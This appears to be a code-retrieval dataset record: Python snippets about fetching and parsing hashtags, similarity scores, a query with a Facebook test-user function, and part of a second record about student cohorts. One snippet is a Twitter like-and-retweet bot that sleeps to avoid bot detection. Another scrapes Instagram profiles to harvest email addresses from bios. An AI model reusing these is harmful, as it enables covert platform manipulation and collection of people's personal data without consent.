"def like_retweet(self):\n \n bot = self.bot \n logging.debug('Get Hashtag')\n hashtag = Twitterbot.getHashtags(self)\n logging.debug('Bot for Like_retweet initalized')\n # fetches the latest tweets with the provided hashtag \n bot.get( \n 'https://twitter.com/search?q=%23'+hashtag+'&src=trend_click&vertical=trends'\n ) \n \n time.sleep(3) \n \n # using set so that only unique links \n # are present and to avoid unnecessary repetition \n links = set() \n \n # obtaining the links of the tweets \n for _ in range(3): \n # executing javascript code \n # to scroll the webpage \n bot.execute_script( \n 'window.scrollTo(0, document.body.scrollHeight)'\n ) \n \n time.sleep(4) \n \n # using list comprehension \n # for adding all the tweets link to the set \n # this particular piece of code might \n # look very complicated but the only reason \n # I opted for list comprehension because is \n # lot faster than traditional loops \n [ \n links.add(elem.get_attribute('href')) \n for elem in bot.find_elements_by_xpath(\"//a[@dir ='auto']\") \n ] \n i = 0\n # traversing through the generated links \n for link in links:\n #Nothing for the Hashtag was found, another run is required\n #if len(links ==6):\n # break\n # Twitterbot.like_retweet(self)\n # opens individual links \n #print(len(links))\n bot.get(link) \n time.sleep(4)\n if i == 3:\n break\n i += 1\n try: \n # retweet button selector \n bot.find_element_by_css_selector( \n '.css-18t94o4[data-testid =\"retweet\"]'\n ).click() \n # initializes action chain \n actions = ActionChains(bot) \n # sends RETURN key to retweet without comment \n actions.send_keys(Keys.RETURN).perform() \n \n # like button selector \n bot.find_element_by_css_selector( \n '.css-18t94o4[data-testid =\"like\"]'\n ).click() \n # adding higher sleep time to avoid \n # getting detected as bot by twitter \n logging.info(f'Liked and retweeted:\"{link}\"')\n time.sleep(10) \n except: \n time.sleep(2) \n \n # fetches the main homepage \n bot.get('https://twitter.com/')",
"def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags",
"def getByHashtags(hashtag):\n\n # set page_limits. The default is 1 \n pages_limit = request.args.get('pages_limit') or 1\n pages_limit = int(pages_limit)\n\n raw_response = get_response(tw_api, 'search/tweets', { 'q': '#' + hashtag, 'count': 100 }, pages_limit)\n list_response = convert_resp2list(raw_response)\n return jsonify(list_response)",
"def searchTweets():\n if 'api' not in globals():\n startTwitterApi(getApiKeys(fileName='apiConf2.txt'))\n #SEARCHING TWEETS CONTAINING THE HASHTAG \"#bitcoin\" USING TWEEPY LIBRARY\n myTweets= []\n #words=list(map(str,words))\n if words:\n myQuery=' OR '.join(words)\n else:\n myQuery = '*'\n if removeRetweets:\n myQuery += ' - filter:retweets'\n kwargs['q']=myQuery\n kwargs['count']=100\n kwargs['tweet_mode']='extended'\n if 'startingDate' in kwargs:\n kwargs['since']=kwargs['startingDate']\n del(kwargs['startingDate'])\n if 'endingDate' in kwargs:\n kwargs['until']=kwargs['endingDate']\n del(kwargs['endingDate'])\n if 'maxTweets' in kwargs:\n del(kwargs['maxTweets'])\n if sortBy=='newest':\n for tweet in tweepy.Cursor(api.search, kwargs).items(maxTweets):\n tweet._json['text']=tweet._json['full_text']\n del (tweet._json['full_text'])\n myTweets.append(tweet._json)\n else:\n for tweet in tweepy.Cursor(api.search, kwargs).items():\n tweet._json['text']=tweet._json['full_text']\n del (tweet._json['full_text'])\n myTweets.append(tweet._json)\n return getTopNTweets(myTweets, maxTweets)",
"def get_tweets_by_hashtag_route(hashtag):\n response, code = get_tweets_by_hashtag(\n hashtag, request.args.get('limit', 30))\n return jsonify(response), code",
"def get_hashtag_tweets(self, hashtag,\n count=settings.TWITTER_DEFAULT_LIMIT):\n url = urljoin(self.base_url, \"/search/tweets.json\")\n response = self.session.get(\n url,\n params={\n \"q\": hashtag,\n \"count\": count,\n \"include_entities\": True\n },\n auth=self.__auth,\n )\n data = response.json()\n if response.ok:\n data = [Tweet(tweet_data) for tweet_data in data['statuses']]\n else:\n if 'error' in data:\n raise TwitterException(data['error'], code=response.status_code)\n elif 'errors' in data:\n error = data['errors'][0]\n raise TwitterException(error['message'], code=response.status_code)\n return data",
"def gettweets(request):\n temp = json.loads(request.body)\n print (temp['hashtags'])\n return Response(tw_fetcher.gethashes(temp['hashtags']), status=status.HTTP_201_CREATED)",
"def get_top_hashtags_from_twitter_api(country='Japan', extended_search=True, debug=False):\n trends = get_top_trends_from_twitter(country=country, exclude_hashtags=False)\n trends = json.loads(trends)\n\n trending_hashtags = [t['label'] for t in trends]\n\n #print(json.dumps(trends, indent=4, ensure_ascii=False))\n\n queries = [t['query'] for t in trends]\n\n if debug:\n #[print(x) for x in trends]\n #[print(x) for x in queries]\n queries = [queries[0]]\n\n full_hashtags_list = []\n for query in queries:\n #print(query)\n # there is no country filter, but there is language filter at least\n if country == 'Japan':\n responses = api.GetSearch(term=query, locale='ja', return_json=True)\n try: responses = responses['statuses']\n except: print(responses)\n else:\n responses = api.GetSearch(term=query, return_json=True)\n try: responses = responses['statuses']\n except: print(responses)\n\n #print(json.dumps(responses, indent=4, ensure_ascii=False))\n\n trend_hashtags_list = []\n for response in responses:\n if debug: print(json.dumps(response, indent=4, ensure_ascii=False))\n text = response['text']\n\n hashtags_list = response['entities']['hashtags']\n\n if len(hashtags_list) > 0:\n hashtags_list = [h['text'] for h in hashtags_list]\n [trend_hashtags_list.append(h) for h in hashtags_list]\n\n full_hashtags_list.append(trend_hashtags_list)\n\n flat_hashtags_list = [item for sublist in full_hashtags_list for item in sublist]\n\n # turn it into a set to clear duplicates, then append #\n flat_hashtags_list = list(set(flat_hashtags_list))\n flat_hashtags_list = ['#'+h for h in flat_hashtags_list]\n\n flat_tier_list = []\n for h in flat_hashtags_list:\n if h in trending_hashtags:\n flat_tier_list.append(1)\n else:\n flat_tier_list.append(2)\n\n output = []\n for hashtag, tier in zip(flat_hashtags_list, flat_tier_list):\n output.append({\n \"label\": hashtag,\n \"tier\": tier\n })\n\n sorted_output = sorted(output, key=lambda x: x['tier'])\n\n output_json = json.dumps(sorted_output, ensure_ascii=False)\n return output_json",
"def tweet_split_hashtags(word, append_hashtag):\n if word.startswith('#') and len(word) > 1:\n res = ''\n res += '<hashtag> '\n res += infer_spaces(word[1:])\n if append_hashtag:\n res += ' '\n res += word\n return res\n else:\n return word",
"def add_tweet(self,hash_tag_tuple,epoch_time):\n # Check if tweet is in order, inside the window duration, or outside\n t_diff = self.latest_time - epoch_time > self.t_window\n\n if t_diff <= self.t_window:\n self.latest_time = max(epoch_time,self.latest_time)\n\n current_vertices = self.graph.vs._name_index\n if self.verbose:\n print('Graph name index: '+str(current_vertices))\n print('Graph name index type: '+str(type(current_vertices)))\n\n # current vertivces will have none type when it is initilazed empty\n if current_vertices is not None:\n\n # Add hashtag to graph as vertex, if its already exists, nothing happens\n for hash_tag in hash_tag_tuple:\n # only add hashtag if it isn't already in the graph\n if hash_tag not in current_vertices:\n if self.verbose: print(\"Adding Vertex: \"+str(hash_tag))\n self.graph.add_vertex(name=hash_tag)\n else:\n # Add hashtag to graph as vertex, if its already exists, nothing happens\n for hash_tag in hash_tag_tuple:\n if self.verbose: print(\"Adding Vertex: \"+str(hash_tag))\n self.graph.add_vertex(name=hash_tag)\n\n\n\n # Add edges with associated epoch time\n for edge in combinations(hash_tag_tuple,r=2):\n if self.verbose: print('Adding Edge Pair:'+str(edge)+\" Time:\"+str(epoch_time))\n\n self.graph.add_edge(source=edge[0],target=edge[1],time=epoch_time)\n\n self.trim()\n\n # if tweet is outside of the time window than toss it\n else:\n return\n\n return",
"def hashtags(max: int = None):\n for hashtag in client.hashtags(max=max):\n print(json.dumps(hashtag))",
"def extract_hashtags(tweet):\n tknzr = TweetTokenizer()\n hashtags = [token.lower() for token in tknzr.tokenize(tweet) if re.match(hashtag_re, token)]\n return hashtags",
"def sort_hashtags_by_popularity(tweets: list) -> list:\n hashtags_by_popularity = {}\n pattern = r\"#\\w+\"\n for tweet in tweets:\n find_hashtag = re.findall(pattern, tweet.content)\n if not find_hashtag:\n continue\n else:\n for ht in find_hashtag:\n hashtags_by_popularity.setdefault(ht, []).append(tweet.retweets)\n print(hashtags_by_popularity)\n for k, v in hashtags_by_popularity.items():\n hashtags_by_popularity[k] = sum(v)\n print(hashtags_by_popularity)\n sorted_ht = sorted(hashtags_by_popularity.items(), key=lambda x: x[-1], reverse=True)\n print(hashtags_by_popularity)\n return [ht[0] for ht in sorted_ht]",
"def separate_hastags_mentions_urls(tweet):\n \n text = tweet.lower()\n hashtag_list = re.findall(\"#([a-zA-Z0-9_]{1,50})\", text)\n \n text = re.sub(r'http\\S+', '', text)\n clean_tweet = re.sub(\"@[A-Za-z0-9_]+\",\"\", text)\n clean_tweet = re.sub(\"#[A-Za-z0-9_]+\",\"\", clean_tweet)\n \n return clean_tweet, hashtag_list",
"def queryTerm2Twitter(term): \n statusList = api.GetSearch(term, count=100, result_type='recent')\n timeStampOfStatus = [datetime.fromtimestamp(i.created_at_in_seconds) for i in statusList]\n timeStampOfStatus.sort() \n return timeStampOfStatus[0]",
"def extract_recent_tag(self, tag):\n\n url_string = \"https://www.instagram.com/explore/tags/%s/\" % tag\n response = bs4.BeautifulSoup(requests.get(url_string).text, \"html.parser\")\n potential_query_ids = self.get_query_id(response)\n shared_data = self.extract_shared_data(response)\n\n media = shared_data['entry_data']['TagPage'][0]['tag']['media']\n posts = []\n for node in media['nodes']:\n post = self.extract_recent_instagram_post(node)\n posts.append(post)\n self.save_results(posts)\n\n end_cursor = media['page_info']['end_cursor']\n\n # figure out valid queryId\n for potential_id in potential_query_ids:\n url = \"https://www.instagram.com/graphql/query/?query_id=%s&tag_name=%s&first=12&after=%s\" % (\n potential_id, tag, end_cursor)\n try:\n data = requests.get(url).json()\n if 'hashtag' not in data['data']:\n # empty response, skip\n continue\n query_id = potential_id\n success = True\n break\n except JSONDecodeError as de:\n # no valid JSON retured, most likely wrong query_id resulting in 'Oops, an error occurred.'\n pass\n if not success:\n log.error(\"Error extracting Query Id, exiting\")\n sys.exit(1)\n\n while end_cursor is not None:\n url = \"https://www.instagram.com/graphql/query/?query_id=%s&tag_name=%s&first=12&after=%s\" % (\n query_id, tag, end_cursor)\n data = requests.get(url).json()\n if 'hashtag' not in data['data']:\n # empty response, skip\n continue\n end_cursor = data['data']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']\n posts = self.extract_instagram_posts(data['data']['hashtag']['edge_hashtag_to_media']['edges'])\n self.save_results(posts)",
"def _process_hashtag(hashtag):\r\n\r\n\tglobal total_inserted\r\n\r\n\tsite = requests.get('https://www.instagram.com/explore/tags/{0}/'.format(hashtag))\r\n\tsoup = BeautifulSoup(site.text, 'html.parser')\r\n\t\r\n\tif site.status_code == 404:\r\n\t\tlogging.error('[MISS] Tag not found. Continuing to next tag...')\r\n\t\treturn\r\n\r\n\tshared_data_post = _parse_shared_data(soup)\r\n\ttag_nodes = shared_data_post['entry_data']['TagPage'][0]['tag']['media']['nodes']\r\n\ttag_nodes = sorted(tag_nodes, key=lambda k: k['likes'], reverse=True)\r\n\r\n\tlogging.error('Number of posts: {0}'.format(len(tag_nodes)))\r\n\r\n\tndx = -1\r\n\tfor post in tag_nodes:\r\n\t\tndx += 1\r\n\r\n\t\tif ndx > 50:\r\n\t\t\treturn\r\n\t\t\r\n\t\t# get top posts\r\n\t\tpost_url = 'https://www.instagram.com/p/{0}'.format(post['code'])\r\n\t\tmedia_page = requests.get(post_url)\r\n\t\tsoup = BeautifulSoup(media_page.text, 'html.parser')\r\n\r\n\t\tshared_data_media_page = _parse_shared_data(soup)\r\n\t\ttry:\r\n\t\t\tusername = shared_data_media_page['entry_data']['PostPage'][0]['graphql']['shortcode_media']['owner']['username']\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error('Could not get username from post page. Continuing...')\r\n\t\t\tcontinue\r\n\r\n\t\tprofile_page = requests.get('https://www.instagram.com/{0}/'.format(username))\r\n\r\n\t\tif profile_page.status_code == 404:\r\n\t\t\tlogging.error('{0} leads to a 404 error. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\r\n\t\tsoup = BeautifulSoup(profile_page.text, 'html.parser')\r\n\r\n\t\tshared_data_user_profile = _parse_shared_data(soup)\r\n\r\n\t\ttry:\r\n\t\t\tis_private = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['is_private']\r\n\t\t\tif is_private:\r\n\t\t\t\tlogging.error('{0} is either unavailable, private, or deactivated. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\t\t\t\tcontinue\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error(e)\r\n\t\t\tlogging.error('{0} is either unavailable, private, or deactivated. Skipping...'.\\\r\n\t\t\t\t\tformat(username))\r\n\t\t\tcontinue \r\n\r\n\t\tusername = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['username']\r\n\t\tuser_id = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['id']\r\n\t\tuser_bio = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['biography']\r\n\r\n\t\tif not user_bio or user_bio == '':\r\n\t\t\tlogging.error('[MISS] {0} has no bio (therefore no e-mail). Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\tuser_bio = re.sub(r'[^\\x00-\\x7f]', r'', user_bio.encode('utf-8').strip())\r\n\t\temail = re.search(r'[-0-9a-zA-Z.+_]+@[-0-9a-zA-Z.+_]+\\.[a-zA-Z]{2,4}',\r\n\t\t\t\t\tstr(user_bio))\r\n\r\n\t\t# if user has no email, skip\r\n\t\tif email:\r\n\t\t\temail = email.group()\r\n\t\telse:\r\n\t\t\tlogging.error('[MISS] {0} has no email. Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\tlogging.error('{0} has an email!! :-) Processing...'.format(username))\r\n\t\tpost_count = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['media']['count']\r\n\r\n\t\ttry:\r\n\t\t\tfollowers = shared_data_user_profile['entry_data']['ProfilePage'][0]['user']['followed_by']['count']\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error('[MISS] Could not get # of followers user profile page. Continuing...')\r\n\t\t\tcontinue\r\n\r\n\t\t# if num followers is less than 100, skip\r\n\t\tif followers < 100:\r\n\t\t\tlogging.error('[MISS] {0} has less than 100 followers. 
Skipping...'.format(username))\r\n\t\t\tcontinue\r\n\r\n\t\t# check if ig user already exists in database\r\n\t\tig_user = IgUsers.objects.filter(username=username)\r\n\r\n\t\tif ig_user.exists():\r\n\t\t\t# if user exists, update e-mail, post counts, followers, and average likes\r\n\t\t\tig_user = ig_user.first()\r\n\t\telse:\r\n\t\t\t# else create a new user and save into DB\r\n\t\t\tig_user = IgUsers()\r\n\t\t\tig_user.username = username\r\n\t\t\r\n\t\tig_user.email = email\r\n\t\tig_user.followers = followers\r\n\t\tig_user.emailscraped = datetime.datetime.now()\r\n\t\tig_user.postcount = post_count\r\n\t\tig_user.postavglike = _find_avg_likes(shared_data_user_profile)\r\n\t\tig_user.verified = ig_user.verified or 0\r\n\t\tig_user.userid = user_id\r\n\t\tig_user.emailsent = ig_user.verified or 0\r\n\t\tig_user.related_accs_scraped = ig_user.related_accs_scraped or False\r\n\r\n\t\tig_user.save()\r\n\r\n\t\t# now loop through media and grab hashtags\r\n\t\tlogging.error('... now processing hashtags for user {0}'.format(username))\r\n\t\ttry:\t\t\t\r\n\t\t\tmedia_desc = shared_data_media_page['entry_data']['PostPage'][0]['graphql']['shortcode_media']['edge_media_to_caption']['edges'][0]['node']['text']\r\n\t\t\tmedia_desc = re.sub(r'[^\\x00-\\x7f]', r'', media_desc.encode('utf-8').strip())\r\n\t\t\ttmp_hashtag_arr = re.findall(r'#(\\w+)', media_desc)\r\n\t\t\thashtag_arr = []\r\n\t\t\tfor ndx in range(len(tmp_hashtag_arr)):\r\n\r\n\t\t\t\tif len(tmp_hashtag_arr[ndx]) > 1 and not any(char.isdigit() for char in tmp_hashtag_arr[ndx]):\r\n\t\t\t\t\thashtag_arr.append(tmp_hashtag_arr[ndx])\t\t\t\t\t\r\n\r\n\t\t\tif not hashtag_arr:\r\n\t\t\t\thashtag_arr.append(hashtag)\r\n\r\n\t\t\t# now save hashtags\r\n\t\t\tfor tag in hashtag_arr:\r\n\t\t\t\tnew_tag = IgUserTags()\r\n\t\t\t\tnew_tag.userid = user_id\r\n\t\t\t\tnew_tag.hashtag = tag\r\n\t\t\t\tnew_tag.frequency = 0\r\n\t\t\t\tnew_tag.save()\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlogging.error(e)\r\n\t\t\tlogging.error('Influencer saved, but unable to save hashtag...!')\r\n\t\t\tprint e\r\n\t\t\tpass\r\n\r\n\t\ttotal_inserted += 1"
] |
[
"0.6311522",
"0.6274851",
"0.6230637",
"0.6107197",
"0.6083219",
"0.60664827",
"0.60491127",
"0.59684294",
"0.59415287",
"0.5937693",
"0.5920222",
"0.5903852",
"0.58821666",
"0.5870542",
"0.5857933",
"0.58483285",
"0.5847059",
"0.5841191",
"0.5840299",
"0.5798845",
"0.57588327",
"0.57424885",
"0.5722008",
"0.5719945",
"0.57003176",
"0.56830096",
"0.5657215",
"0.5650813",
"0.56281734",
"0.5626892"
] |
0.670553
|
0
|
Creates a developer test user with Facebook
|
def create_test_user(self):
response = urllib2.urlopen('https://graph.facebook.com/%s/accounts/test-users?installed=true&name=test_acc&locale=en_US&permissions=publish_stream&method=post&access_token=%s' % (self.consumer_key, self.token))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_39_facebook_oauth_creation(self):\r\n fake_response = {\r\n u'access_token': u'access_token',\r\n u'token_type': u'Bearer',\r\n u'expires_in': 3600,\r\n u'id_token': u'token'}\r\n\r\n fake_user = {\r\n u'username': u'teleyinex',\r\n u'first_name': u'John',\r\n u'last_name': u'Doe',\r\n u'verified': True,\r\n u'name': u'John Doe',\r\n u'locale': u'en_US',\r\n u'gender': u'male',\r\n u'email': u'[email protected]',\r\n u'quotes': u'\"quote',\r\n u'link': u'http://www.facebook.com/johndoe',\r\n u'timezone': 1,\r\n u'updated_time': u'2011-11-11T12:33:52+0000',\r\n u'id': u'11111'}\r\n\r\n from pybossa.view import facebook\r\n response_user = facebook.manage_user(fake_response['access_token'],\r\n fake_user, None)\r\n\r\n user = db.session.query(User).get(1)\r\n\r\n assert user.email_addr == response_user.email_addr, response_user",
"def test_40_facebook_oauth_creation(self):\r\n fake_response = {\r\n u'access_token': u'access_token',\r\n u'token_type': u'Bearer',\r\n u'expires_in': 3600,\r\n u'id_token': u'token'}\r\n\r\n fake_user = {\r\n u'username': u'teleyinex',\r\n u'first_name': u'John',\r\n u'last_name': u'Doe',\r\n u'verified': True,\r\n u'name': u'John Doe',\r\n u'locale': u'en_US',\r\n u'gender': u'male',\r\n u'email': u'[email protected]',\r\n u'quotes': u'\"quote',\r\n u'link': u'http://www.facebook.com/johndoe',\r\n u'timezone': 1,\r\n u'updated_time': u'2011-11-11T12:33:52+0000',\r\n u'id': u'11111'}\r\n\r\n self.register()\r\n self.signout()\r\n\r\n from pybossa.view import facebook\r\n response_user = facebook.manage_user(fake_response['access_token'],\r\n fake_user, None)\r\n\r\n assert response_user is None, response_user",
"def setUp(self):\n self.new_user = User.objects.create_user(first_name='John', last_name='Doe', username='john_doe', email='[email protected]', bio='I am new here.', password='test_password', website='example.com', social_media={\n 'facebook':'Facebook link',\n 'Dribble': 'Dribble link',\n })",
"def create_user(self):\n User.objects.create_user('test', '[email protected]', 'testing')",
"def test_create_user(self):\n \n new_user = {\"username\": \"beny1976\", \"vocab_count\": 0, \"name\": \"beny rood\", \"sex\": \"male\", \"dob\": \"18/10/1979\"}\n msg = app.create_user(predefined_user=new_user)\n self.assertTrue(msg != \"\")",
"def createDeveloper(self):\n self.createUser()\n self.user.is_developer = True\n self.user.put()",
"def sample_user(email=user_v['email'], password=user_v['password']):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n\n return get_user_model().objects.create_user(email, password)",
"def create_test_user(self):\n user = User.objects.create_user(\n username='[email protected]', password='password')\n user.groups.add(self.group)\n user.user_permissions.add(p('wagtailadmin.access_admin'))\n user.save()\n return user",
"def test_able_to_create_a_user():\n response = api_helper.create_user(pytest.test_user)\n assert response.status_code == 201\n check_user_data_in_response(response.json()[\"data\"])",
"def test_create_user(self):\n pass",
"def test_create_user(self):\n pass",
"def test_create_user(self):\n pass",
"def test_good_user_creation(self):\n data = json.dumps({\n \"username\" : \"mark\", \"email\" : \"[email protected]\",\n \"password\" : \"secret12345\", \"confirm_password\" : \"secret12345\"})\n response = self.app.post(\n '/api/v3/users', data=data,\n content_type='application/json',\n headers=self.admin_header)\n self.assertEqual(response.status_code, 201)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def test_createuser():\n url = baseUrl + userurl\n payload = user_payload\n logging.info(\"Create a user: %s\" % payload)\n r = requests.post(url, data=json.dumps(payload), headers=header)\n assert r.status_code == 201\n resp = r.text\n assert resp == 'Success'",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email: str = \"[email protected]\", password: str = \"testpass\"):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='testpass'):\n return get_user_model().objects.create_user(email, password)",
"def sample_user(email='[email protected]', password='password'):\n return get_user_model().objects.create_user(email, password)",
"def test_create_user(self):\n data = {\n \"firstname\": \"John\",\n \"lastname\": \"Doe\",\n \"password\": \"supersecret\",\n \"password_repeat\": \"supersecret\",\n }\n res = self.post(url=\"/users\", data=data)\n self.assertEqual(res.status_code, 200)\n self.assertIn(b\"Created user.\", res.data)\n\n user = User.query.filter_by(id=6).first()\n self.assertTrue(user)\n self.assertEqual(user.firstname, \"John\")\n self.assertEqual(user.lastname, \"Doe\")\n self.assertFalse(user.is_verified)",
"def create_test_user():\n return User.objects.create(username='test_username', password='test_password')",
"def sample_user(email='[email protected]', password='open@123'):\n return get_user_model().objects.create_user(email, password)",
"def add_testuser(self):\n user = UserFactory.create()\n user.username = 'testuser'\n user.set_password('testuser')\n user.save()\n return user.profile",
"def test_create_user(self):\n first_name = \"b\"\n last_name = \"b\"\n username = \"b\"\n email = \"b\"\n password = \"b\"\n\n manager = UserManager()\n result = manager.create(first_name, last_name, username, email, password)\n self.assertTrue(result)\n\n user = User.objects.get(username=username)\n self.assertEqual(first_name, user.first_name)\n self.assertEqual(last_name, user.last_name)\n self.assertEqual(username, user.username)\n self.assertEqual(email, user.email)\n self.assertEqual(password, user.testdata.password)\n self.assertEqual(username, user.testdata.username)\n self.assertEqual(email, user.testdata.email)\n self.assertNotEqual(user.authtests, None)",
"def sample_user(email=\"[email protected]\",\n password=\"password123\",\n name=\"some name\"):\n return get_user_model().objects.create_user(email=email,\n password=password,\n name=name)",
"def add_testuser(self):\n user = UserFactory.create()\n user.username = 'testuser'\n user.set_password('testuser')\n user.is_active = True\n user.save()\n return user.profile",
"def test_valid_account_create_is_a_developer(self):\n ident_choice = UserIdentificationLabel.objects.get(slug=\"ident1\")\n form_data = {\n 'invitation_code': '1234',\n 'email': '[email protected]',\n 'organization_name': 'transhealth',\n 'password1': 'BEDrocks@123',\n 'password2': 'BEDrocks@123',\n 'first_name': 'Hank',\n 'last_name': 'Flinstone',\n 'identification_choice': str(ident_choice.pk),\n }\n self.client.post(self.url, form_data, follow=True)\n up = UserProfile.objects.get(user__email='[email protected]')\n self.assertEqual(up.user_type, 'DEV')"
] |
[
"0.77105623",
"0.7697404",
"0.7588671",
"0.7400935",
"0.72141296",
"0.7197762",
"0.71746993",
"0.7155389",
"0.71482134",
"0.7129204",
"0.7109574",
"0.7109574",
"0.7109574",
"0.7106927",
"0.7098064",
"0.7098064",
"0.7098064",
"0.708655",
"0.7084253",
"0.70820147",
"0.707454",
"0.7070056",
"0.70351624",
"0.70329624",
"0.702178",
"0.70200443",
"0.700491",
"0.69790685",
"0.6952986",
"0.6940845"
] |
0.7917467
|
0
|
Retrieve all students with the cohort name
|
def all_cohorts(self):
with sqlite3.connect(self.db_path) as conn:
        conn.row_factory = lambda cursor, row: Cohort(row[1])
db_cursor = conn.cursor()
db_cursor.execute("""
select c.id,
c.name
from cohorts c
order by c.name
""")
all_cohorts = db_cursor.fetchall()
print('\n***All Cohorts***')
for cohort in all_cohorts:
print(cohort)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def all_cohorts(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Cohort(\n row[1]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select cohort.Id,\n Name\n from cohort\n \"\"\")\n\n all_cohorts = db_cursor.fetchall()\n\n for cohort in all_cohorts:\n print(cohort)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)",
"def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)",
"def users_in_cohort(request, course_key, cohort_id):\r\n # this is a string when we get it here\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_key)\r\n\r\n get_course_with_access(request.user, 'staff', course_key)\r\n\r\n # this will error if called with a non-int cohort_id. That's ok--it\r\n # shoudn't happen for valid clients.\r\n cohort = cohorts.get_cohort_by_id(course_key, int(cohort_id))\r\n\r\n paginator = Paginator(cohort.users.all(), 100)\r\n page = request.GET.get('page')\r\n try:\r\n users = paginator.page(page)\r\n except PageNotAnInteger:\r\n # return the first page\r\n page = 1\r\n users = paginator.page(page)\r\n except EmptyPage:\r\n # Page is out of range. Return last page\r\n page = paginator.num_pages\r\n contacts = paginator.page(page)\r\n\r\n user_info = [{'username': u.username,\r\n 'email': u.email,\r\n 'name': '{0} {1}'.format(u.first_name, u.last_name)}\r\n for u in users]\r\n\r\n return json_http_response({'success': True,\r\n 'page': page,\r\n 'num_pages': paginator.num_pages,\r\n 'users': user_info})",
"def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)",
"def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)",
"def get_cohort_by_name(course_key, name):\r\n return CourseUserGroup.objects.get(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT,\r\n name=name\r\n )",
"def get_course_cohort_names(course_key):\r\n return [c.name for c in get_course_cohorts(course_key)]",
"def get_cohort_users(self, cohort):\n\t\tusers = []\n\t\tfor user, reg_date in self.customers.items():\n\t\t\tif self.is_cohort_user(cohort, reg_date):\n\t\t\t\tusers.append(user)\n\t\treturn users",
"def get_campus_students(session, school):\n # Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids",
